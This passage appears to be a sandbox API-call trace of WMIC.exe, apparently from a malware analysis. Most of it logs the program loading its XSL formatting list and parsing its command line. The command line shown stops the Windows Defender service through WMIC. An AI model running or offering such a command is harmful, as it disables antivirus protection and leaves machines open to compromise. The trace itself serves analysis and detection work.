(_Size=0x18) returned 0x61c760 [0250.602] malloc (_Size=0x18) returned 0x61c780 [0250.602] SysStringLen (param_1="CSV") returned 0x3 [0250.602] SysStringLen (param_1="TABLE") returned 0x5 [0250.603] SysStringLen (param_1="CSV") returned 0x3 [0250.603] SysStringLen (param_1="LIST") returned 0x4 [0250.603] SysStringLen (param_1="CSV") returned 0x3 [0250.603] SysStringLen (param_1="HTABLE") returned 0x6 [0250.603] SysStringLen (param_1="CSV") returned 0x3 [0250.603] SysStringLen (param_1="HFORM") returned 0x5 [0250.603] malloc (_Size=0x30) returned 0x618280 [0250.603] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.603] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.603] IUnknown:Release (This=0x32a280) returned 0x0 [0250.603] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=9, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.603] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="texttable.xsl") returned 0x0 [0250.603] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.603] malloc (_Size=0x18) returned 0x61c7a0 [0250.603] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.603] free (_Block=0x61c7a0) [0250.604] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0250.604] malloc (_Size=0x18) returned 0x61c7a0 [0250.604] malloc (_Size=0x18) returned 0x61c7c0 [0250.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.604] SysStringLen (param_1="TABLE") returned 0x5 [0250.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.604] SysStringLen (param_1="VALUE") returned 0x5 [0250.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.604] SysStringLen (param_1="XML") returned 0x3 [0250.604] SysStringLen (param_1="XML") returned 0x3 [0250.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.604] malloc (_Size=0x30) returned 0x6182c0 [0250.604] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.604] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.604] IUnknown:Release (This=0x32a280) returned 0x0 [0250.604] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=10, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.604] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="texttable.xsl") returned 0x0 [0250.604] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.605] malloc (_Size=0x18) returned 0x61c7e0 [0250.605] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.605] free (_Block=0x61c7e0) [0250.605] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0250.605] malloc (_Size=0x18) returned 0x61c7e0 [0250.605] malloc (_Size=0x18) returned 0x61c800 [0250.605] SysStringLen (param_1="texttablewsys") returned 0xd [0250.605] SysStringLen (param_1="TABLE") returned 0x5 [0250.605] SysStringLen (param_1="texttablewsys") returned 0xd [0250.605] SysStringLen (param_1="XML") returned 0x3 [0250.605] SysStringLen (param_1="texttablewsys") returned 0xd [0250.605] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.605] SysStringLen (param_1="XML") returned 0x3 [0250.605] SysStringLen (param_1="texttablewsys") returned 0xd [0250.605] malloc (_Size=0x30) returned 0x618300 [0250.605] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.605] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.605] IUnknown:Release (This=0x32a280) returned 0x0 [0250.605] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=11, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.606] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="texttable.xsl") returned 0x0 [0250.606] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.606] malloc (_Size=0x18) returned 0x61c820 [0250.606] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.606] free (_Block=0x61c820) [0250.606] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0250.606] malloc (_Size=0x18) returned 0x61c820 [0250.606] malloc (_Size=0x18) returned 0x61c840 [0250.606] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.606] SysStringLen (param_1="TABLE") returned 0x5 [0250.606] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.606] SysStringLen (param_1="XML") returned 0x3 [0250.606] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.606] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.606] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.606] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.606] malloc (_Size=0x30) returned 0x618340 [0250.607] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.607] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.607] IUnknown:Release (This=0x32a280) returned 0x0 [0250.607] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=12, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.607] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="texttable.xsl") returned 0x0 [0250.607] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.607] malloc (_Size=0x18) returned 0x61c860 [0250.607] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.607] free (_Block=0x61c860) [0250.607] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0250.607] malloc (_Size=0x18) returned 0x61c860 [0250.607] malloc (_Size=0x18) returned 0x61c880 [0250.607] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0250.607] SysStringLen (param_1="TABLE") returned 0x5 [0250.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0250.608] SysStringLen (param_1="XML") returned 0x3 [0250.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0250.608] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0250.608] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.608] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0250.608] malloc (_Size=0x30) returned 0x618380 [0250.608] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.608] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.608] IUnknown:Release (This=0x32a280) returned 0x0 [0250.608] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=13, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.608] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="texttable.xsl") returned 0x0 [0250.608] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.608] malloc (_Size=0x18) returned 0x61c8a0 [0250.608] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.608] free (_Block=0x61c8a0) [0250.609] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0250.609] malloc (_Size=0x18) returned 0x61c8a0 [0250.609] malloc (_Size=0x18) returned 0x61c8c0 [0250.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.609] SysStringLen (param_1="TABLE") returned 0x5 [0250.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.609] SysStringLen (param_1="XML") returned 0x3 [0250.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.609] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.609] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.609] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.609] malloc (_Size=0x30) returned 0x6183c0 [0250.609] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.609] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.609] IUnknown:Release (This=0x32a280) returned 0x0 [0250.609] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=14, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.609] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="texttable.xsl") returned 0x0 [0250.609] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.610] malloc (_Size=0x18) returned 0x61c8e0 [0250.610] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.610] free (_Block=0x61c8e0) [0250.610] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0250.610] malloc (_Size=0x18) returned 0x61c8e0 [0250.610] malloc (_Size=0x18) returned 0x61c900 [0250.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0250.610] SysStringLen (param_1="TABLE") returned 0x5 [0250.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0250.610] SysStringLen (param_1="XML") returned 0x3 [0250.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0250.610] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0250.610] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0250.610] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.610] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0250.610] malloc (_Size=0x30) returned 0x618400 [0250.611] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.611] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.611] IUnknown:Release (This=0x32a280) returned 0x0 [0250.611] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=15, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.611] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="htable.xsl") returned 0x0 [0250.611] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.611] malloc (_Size=0x18) returned 0x61c920 [0250.611] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.611] free (_Block=0x61c920) [0250.611] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0250.611] malloc (_Size=0x18) returned 0x61c920 [0250.611] malloc (_Size=0x18) returned 0x61c940 [0250.611] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0250.611] SysStringLen (param_1="TABLE") returned 0x5 [0250.611] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0250.611] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.611] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0250.611] SysStringLen (param_1="XML") returned 0x3 [0250.611] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0250.611] SysStringLen (param_1="texttablewsys") returned 0xd [0250.612] SysStringLen (param_1="XML") returned 0x3 [0250.612] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0250.612] malloc (_Size=0x30) returned 0x618440 [0250.612] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.612] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.612] IUnknown:Release (This=0x32a280) returned 0x0 [0250.612] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=16, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.612] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="htable.xsl") returned 0x0 [0250.612] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.612] malloc (_Size=0x18) returned 0x61c960 [0250.612] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.612] free (_Block=0x61c960) [0250.612] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0250.612] malloc (_Size=0x18) returned 0x61c960 [0250.612] malloc (_Size=0x18) returned 0x61c980 [0250.612] SysStringLen (param_1="htable-sortby") returned 0xd [0250.613] SysStringLen (param_1="TABLE") returned 0x5 [0250.613] SysStringLen (param_1="htable-sortby") returned 0xd [0250.613] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.613] SysStringLen (param_1="htable-sortby") returned 0xd [0250.613] SysStringLen (param_1="XML") returned 0x3 [0250.613] SysStringLen (param_1="htable-sortby") returned 0xd [0250.613] SysStringLen (param_1="texttablewsys") returned 0xd [0250.613] SysStringLen (param_1="htable-sortby") returned 0xd [0250.613] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0250.613] SysStringLen (param_1="XML") returned 0x3 [0250.613] SysStringLen (param_1="htable-sortby") returned 0xd [0250.613] malloc (_Size=0x30) returned 0x618480 [0250.613] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.613] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.613] IUnknown:Release (This=0x32a280) returned 0x0 [0250.613] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=17, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.613] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="mof.xsl") returned 0x0 [0250.613] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.613] malloc (_Size=0x18) returned 0x61c9a0 [0250.613] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.614] free (_Block=0x61c9a0) [0250.614] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0250.614] malloc (_Size=0x18) returned 0x61c9a0 [0250.614] malloc (_Size=0x18) returned 0x61c9c0 [0250.614] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0250.614] SysStringLen (param_1="TABLE") returned 0x5 [0250.614] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0250.614] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.614] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0250.614] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.614] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0250.614] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0250.614] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.614] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0250.614] malloc (_Size=0x30) returned 0x6184c0 [0250.614] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.614] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.614] IUnknown:Release (This=0x32a280) returned 0x0 [0250.614] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=18, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.615] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="mof.xsl") returned 0x0 [0250.615] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.615] malloc (_Size=0x18) returned 0x61c9e0 [0250.615] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.615] free (_Block=0x61c9e0) [0250.615] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0250.615] malloc (_Size=0x18) returned 0x61c9e0 [0250.615] malloc (_Size=0x18) returned 0x61ca00 [0250.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0250.615] SysStringLen (param_1="TABLE") returned 0x5 [0250.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0250.615] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0250.615] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0250.615] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0250.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0250.616] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0250.616] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.616] SysStringLen (param_1="wmiclimofformat") returned 0xf [0250.616] malloc (_Size=0x30) returned 0x618500 [0250.616] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.616] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.616] IUnknown:Release (This=0x32a280) returned 0x0 [0250.616] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=19, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.616] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="textvaluelist.xsl") returned 0x0 [0250.616] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.616] malloc (_Size=0x18) returned 0x61ca20 [0250.616] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.616] free (_Block=0x61ca20) [0250.616] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0250.616] malloc (_Size=0x18) returned 0x61ca20 [0250.616] malloc (_Size=0x18) returned 0x61ca40 [0250.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0250.617] SysStringLen (param_1="TABLE") returned 0x5 [0250.617] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0250.617] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.617] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0250.617] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.617] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0250.617] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.617] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.617] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0250.617] malloc (_Size=0x30) returned 0x618540 [0250.617] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.617] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.617] IUnknown:Release (This=0x32a280) returned 0x0 [0250.617] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=20, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.617] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="textvaluelist.xsl") returned 0x0 [0250.617] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.617] malloc (_Size=0x18) returned 0x61ca60 [0250.617] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.617] free (_Block=0x61ca60) [0250.617] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0250.617] malloc (_Size=0x18) returned 0x61ca60 [0250.618] malloc (_Size=0x18) returned 0x61ca80 [0250.618] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0250.618] SysStringLen (param_1="TABLE") returned 0x5 [0250.618] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0250.618] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0250.618] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0250.618] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0250.618] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0250.618] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.618] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0250.618] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0250.618] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0250.618] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0250.618] malloc (_Size=0x30) returned 0x618580 [0250.618] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.618] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.618] IUnknown:Release (This=0x32a280) returned 0x0 [0250.618] IUnknown:Release (This=0x329cc0) returned 0x0 [0250.618] FreeThreadedDOMDocument:IUnknown:Release (This=0x32bc50) returned 0x1 [0250.618] FreeThreadedDOMDocument:IUnknown:Release (This=0x3271d0) returned 0x0 [0250.618] free (_Block=0x616f40) [0250.618] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice" [0250.619] malloc (_Size=0xe0) returned 0x616f00 [0250.619] memcpy_s (in: _Destination=0x616f00, _DestinationSize=0xde, _Source=0x3b25ee, _SourceSize=0xd4 | out: _Destination=0x616f00) returned 0x0 [0250.619] malloc (_Size=0x18) returned 0x61caa0 [0250.619] malloc (_Size=0x18) returned 0x61cac0 [0250.619] malloc (_Size=0x18) returned 0x61cae0 [0250.619] malloc (_Size=0x18) returned 0x61cb00 [0250.619] malloc (_Size=0x80) returned 0x61cd30 [0250.619] GetLocalTime (in: lpSystemTime=0x26f590 | out: lpSystemTime=0x26f590*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x9, wMilliseconds=0x184)) [0250.619] _vsnwprintf (in: _Buffer=0x61cd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x26f4e8 | out: _Buffer="04-28-2020T20:42:09") returned 19 [0250.619] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.619] malloc (_Size=0x90) returned 0x61cdc0 [0250.619] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.619] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.619] malloc (_Size=0x90) returned 0x61ce60 [0250.619] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.619] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.619] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.619] malloc (_Size=0xa) returned 0x61cb20 [0250.619] lstrlenW (lpString="path") returned 4 [0250.620] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0250.620] malloc (_Size=0xa) returned 0x61cb40 [0250.620] malloc (_Size=0x8) returned 0x617150 [0250.620] free (_Block=0x0) [0250.620] free (_Block=0x61cb20) [0250.620] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.620] malloc (_Size=0x1c) returned 0x61cf00 [0250.620] lstrlenW (lpString="Win32_Service") returned 13 [0250.620] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0250.620] malloc (_Size=0x1c) returned 0x61cf30 [0250.620] malloc (_Size=0x10) returned 0x61cb20 [0250.620] memmove_s (in: _Destination=0x61cb20, _DestinationSize=0x8, _Source=0x617150, _SourceSize=0x8 | out: _Destination=0x61cb20) returned 0x0 [0250.620] free (_Block=0x617150) [0250.620] free (_Block=0x0) [0250.620] free (_Block=0x61cf00) [0250.620] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.620] malloc (_Size=0xc) returned 0x61cb60 [0250.620] lstrlenW (lpString="where") returned 5 [0250.620] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0250.620] malloc (_Size=0xc) returned 0x61cb80 [0250.620] malloc (_Size=0x18) returned 0x61cba0 [0250.620] memmove_s (in: _Destination=0x61cba0, _DestinationSize=0x10, _Source=0x61cb20, _SourceSize=0x10 | out: _Destination=0x61cba0) returned 0x0 [0250.620] free (_Block=0x61cb20) [0250.620] free (_Block=0x0) [0250.620] free (_Block=0x61cb60) [0250.620] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.620] malloc (_Size=0x38) returned 0x6185c0 [0250.620] lstrlenW (lpString="\"name like '%%WinDefend%%'\"") returned 27 [0250.620] _wcsicmp (_String1="\"name like '%%WinDefend%%'\"", _String2="\"NULL\"") returned -20 [0250.620] lstrlenW (lpString="\"name like '%%WinDefend%%'\"") returned 27 [0250.621] lstrlenW (lpString="\"name like '%%WinDefend%%'\"") returned 27 [0250.621] malloc (_Size=0x38) returned 0x618600 [0250.621] malloc (_Size=0x20) returned 0x61cf00 [0250.621] memmove_s (in: _Destination=0x61cf00, _DestinationSize=0x18, _Source=0x61cba0, _SourceSize=0x18 | out: _Destination=0x61cf00) returned 0x0 [0250.621] free (_Block=0x61cba0) [0250.621] free (_Block=0x0) [0250.621] free (_Block=0x6185c0) [0250.621] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.621] malloc (_Size=0xa) returned 0x61cba0 [0250.621] lstrlenW (lpString="call") returned 4 